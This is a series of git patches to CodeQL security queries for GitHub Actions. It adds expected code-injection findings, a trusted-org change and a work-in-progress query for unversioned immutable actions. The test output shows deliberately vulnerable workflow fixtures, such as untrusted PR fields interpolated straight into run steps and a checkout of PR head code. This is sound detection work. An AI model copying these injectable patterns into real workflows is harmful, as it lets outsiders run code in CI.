fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -623,6 +635,10 @@ subpaths | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6d33d3cc5691..eb852fdd4d29 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From c44c3bae9fffad54b3b72e3a2a7f0ccd4d1fcafd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:39:58 +0200 Subject: [PATCH 594/707] Update tests --- ql/test/library-tests/commands.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index 12092de34ef9..35305671cf05 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -195,6 +195,8 @@ | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | From 7cba2e07bc232808a5dbc2ec08b044ec2d3c8097 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:40:40 +0200 Subject: [PATCH 595/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 12cf4c6106a4..e5471e236511 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.68 +version: 0.1.69 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b10da74b7118..660f3287090c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.68 +version: 0.1.69 groups: [actions, queries] suites: codeql-suites extractor: javascript From 325727ed6dc6ccc0f7bd2e8ed70084a574f3c7f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 15:59:45 -0400 Subject: [PATCH 596/707] recommend to add octokit to trusted orgs --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b5..2111cc118a97 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From cf9b853a8fba8dac3be1f6d173caf4673edaed2c Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 16:14:03 -0400 Subject: [PATCH 597/707] unversioned immutable actions wip --- ql/lib/codeql/actions/config/Config.qll | 11 ++++++ .../actions/config/ConfigExtensions.qll | 7 ++++ ql/lib/ext/config/immutable_actions.yml | 22 +++++++++++ .../CWE-829/UnversionedImmutableAction.md | 27 +++++++++++++ .../CWE-829/UnversionedImmutableAction.ql | 38 +++++++++++++++++++ 5 files changed, 105 insertions(+) create mode 100644 ql/lib/ext/config/immutable_actions.yml create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.md create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7b..a439f9996239 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -119,6 +119,17 @@ predicate vulnerableActionsDataModel( Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + */ +predicate immutableActionsDataModel( + string action +) { + Extensions::immutableActionsDataModel(action) +} + /** * MaD models for untrusted git commands * Fields: diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2d..c36ad046a3c5 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -58,6 +58,13 @@ extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); +/** + * Holds for actions that are known to be immutable. + */ +extensible predicate immutableActionsDataModel( + string action +); + /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml new file mode 100644 index 000000000000..072e8ed0b099 --- /dev/null +++ b/ql/lib/ext/config/immutable_actions.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: immutableActionsDataModel + data: + - ["actions/checkout"] + - ["actions/cache"] + - ["actions/setup-node"] + - ["actions/upload-artifact"] + - ["actions/setup-python"] + - ["actions/download-artifact"] + - ["actions/github-script"] + - ["actions/setup-java"] + - ["actions/setup-go"] + - ["actions/upload-pages-artifact"] + - ["actions/deploy-pages"] + - ["actions/setup-dotnet"] + - ["actions/stale"] + - ["actions/labeler"] + - ["actions/create-github-app-token"] + - ["actions/configure-pages"] + - ["octokit/request-action"] diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md new file mode 100644 index 000000000000..eab708f8602e --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql new file mode 100644 index 000000000000..d9a1394641fa --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -0,0 +1,38 @@ +/** + * @name Unversioned Immutable Action + * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/unversioned-immutable-action + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) +} + +from UsesStep uses, string repo, string version, Workflow workflow, string name +where + uses.getCallee() = repo and + uses.getEnclosingWorkflow() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) +select uses.getCalleeNode(), + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() From e5508343b197f0bca8dff57e5fe97f41d0bf31f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 15:21:33 -0400 Subject: [PATCH 598/707] update unpinned actions tag test --- .../query-tests/Security/CWE-829/UnpinnedActionsTag.expected | 3 --- 1 file changed, 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07e..a9e5134b28ee 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,9 +10,6 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | From 2d5cd1a61a978417e8c20cf13febd4680823be97 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 16:51:31 -0400 Subject: [PATCH 599/707] WIP. todo: modify help text in query to be helpful, write qlhelp file, find out how to not release to customers --- ql/lib/codeql/actions/config/Config.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 11 +++++++ .../CWE-829/UnversionedImmutableAction.ql | 29 ++++--------------- .../actions/dangerous-git-checkout/action.yml | 2 +- .../UnversionedImmutableAction.expected | 19 ++++++++++++ .../CWE-829/UnversionedImmutableAction.qlref | 1 + 6 files changed, 38 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index a439f9996239..a21f3e358d13 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -120,7 +120,7 @@ predicate vulnerableActionsDataModel( } /** - * MaD models for vulnerable actions + * MaD models for immutable actions * Fields: * - action: action name */ diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 000000000000..2be71612f26e --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -0,0 +1,11 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + immutableActionsDataModel(immutable_action) and + this.getCallee() = immutable_action and + not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + } +} diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index d9a1394641fa..0c6443bc3e64 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -2,7 +2,6 @@ * @name Unversioned Immutable Action * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action * @kind problem - * @security-severity 5.0 * @problem.severity recommendation * @precision high * @id actions/unversioned-immutable-action @@ -12,27 +11,9 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction -bindingset[version] -private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } - -bindingset[repo] -private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) -} - -from UsesStep uses, string repo, string version, Workflow workflow, string name -where - uses.getCallee() = repo and - uses.getEnclosingWorkflow() = workflow and - ( - workflow.getName() = name - or - not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name - ) and - uses.getVersion() = version and - not isTrustedOrg(repo) and - not isPinnedCommit(version) -select uses.getCalleeNode(), - "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + - "', not a pinned commit hash", uses, uses.toString() +from UnversionedImmutableAction step +select step, + "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 57058e7a076f..cd4f0fe660aa 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -4,7 +4,7 @@ runs: using: "composite" steps: - name: Checkout repo - uses: actions/checkout@v4 + uses: actions/checkout@4 with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 000000000000..5ae46862fb43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -0,0 +1,19 @@ +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses 